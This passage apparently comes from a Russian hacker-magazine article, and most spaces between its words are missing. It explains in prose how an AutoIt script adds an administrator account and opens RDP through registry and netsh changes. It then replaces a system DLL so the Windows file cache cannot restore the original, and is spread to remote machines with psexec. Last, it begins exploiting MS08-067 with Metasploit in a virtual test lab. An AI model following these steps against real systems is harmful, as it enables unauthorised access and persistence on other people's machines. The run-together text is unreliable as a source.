чтобыпоставитьзадачуэмуляциипользовательскихдействийнавыполнениевинтерактивномрежиме. Далее— дождатьсяеезапускаиужепотомподменять нужныефайлы. СмотринаDVD полныйкодскриптапод названиемfinal.au3, аятемвременемпоясню, чтокчему. Явесьфункционалзасунулводинфайл, поэтомусначала проверяю, скакимиаргументамизапущенбинарник. Если присутствуетключfsp, значит, будемждатьпоявленияокна ищелкатьпокнопкам. Определитьидентификационные данныеокнаикнопокможноспомощьюAu3Info изсборки AutoIT. Послеэтогояотправляюмашинувперезагрузку, дав юзеру2 минутынасохранениерезультатовработы.
Еслиключfsp незадан, скриптвыполняетсвоюосновнуюзадачу. Сначалаинициализируютсянеобходимые переменныеиосуществляетсяработапосозданиюнового администратора. Затемпроизводятсятелодвижения касательнореестраинетшелла, целькоторых— открытие доступакRDP. ДальшепроверяетсяверсияОСи, если онанеXP, работаскриптапрекращается. Еслижена узлеустановленаXP, спомощьюsc поднимаетсясервис планировщика, инавыполнениеставитсянашжескрипт,
носключомfsp. Подождав, покапланировщикзапустит задачу, скриптреализуетподменубиблиотеки. Дляэтого переименовываетсятекущаяdll (еслизапущенаслужба TermService, библиотекабудетзаблокирована, иудалить еенеполучится), ановаяdll копируетсяв%systemroot%\ system32\DLLCache (чтобыневозможнобыловосстановитьисходнуюверсиюизкэша), и, наконец, подменяется самабиблиотекав%systemroot%\system32.
Послесборкияупаковалсобранныйэкзешникибиблиотекувсамораспаковывающийсяархив. Архивнастроилна распаковкув%temp%, автоматическуюперезаписьвсех файлов(кстати, неперезаписывает— доказано), изапуск %temp%\final.exe поокончаниираспаковки. Хочешьпротестировать? Бериpsexec изапустиархивнаудаленной машине. ЧерезпримернотриминутыподключайсяпоRDP. Уменявсеполучилось, такчтодвигаемсядальше.
УЖАСНЫЙSMB
ПривсейсвоейпростотеиудобствеиспользованияSMB — жуткоглючнаяштука. Ктомуже, извсехтехнологий, реализованныхMicrosoft, этонаверное, однаизсамыхкорявых(не считаяосла). Тотжеметасплойтнесетвсебе14 сплойтовдля smb; незагорамииновыедырки. Нуамыпокавоспользуемсяms08_067, какнаиболеесвежейи, покаеще, достаточно пробивной. Проблемакроетсявбиблиотекеnetapi32.dll, а точнее, вфункцииwcscat (покрайнеймере, такееиспользовалconficker). Дляудаленногодоступаиспользуется
RPC-вызовсUUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,
тоесть— обращениекинтерфейсуsrvsvc.
Чтобынемучитьпользователейлокалки, былорешено создатьтестовыйстенд. ЯнакатилобразвиндынаVmWare собновлениями, вышедшимидооктября2008 года(тогда появилсяпатч), немногоегоподстроиликлонировалв трехвариантах. Итак, полученалокальнаяминисеть, на которойможнооттачиватьмастерствоавтосплойта. Моимудивлениюидосаденебылопредела, когдапопытка применитьметасплойтовскийms08_067 окончилась неудачей! Тажеисторияпостиглаимилвормовский вариант, причемпоследнийвыплюнулошибку«Make SMB Connection error:53 (network path was not found)». Я
подумал, чтовиноватфайер, отключилегоипопробовал заново. Ситуациянемногоизменилась, нобыладалекаот идеала. Метасплойтнеправильноопределилсервиспак
048 |
XÀÊÅÐ 08 /128/ 09 |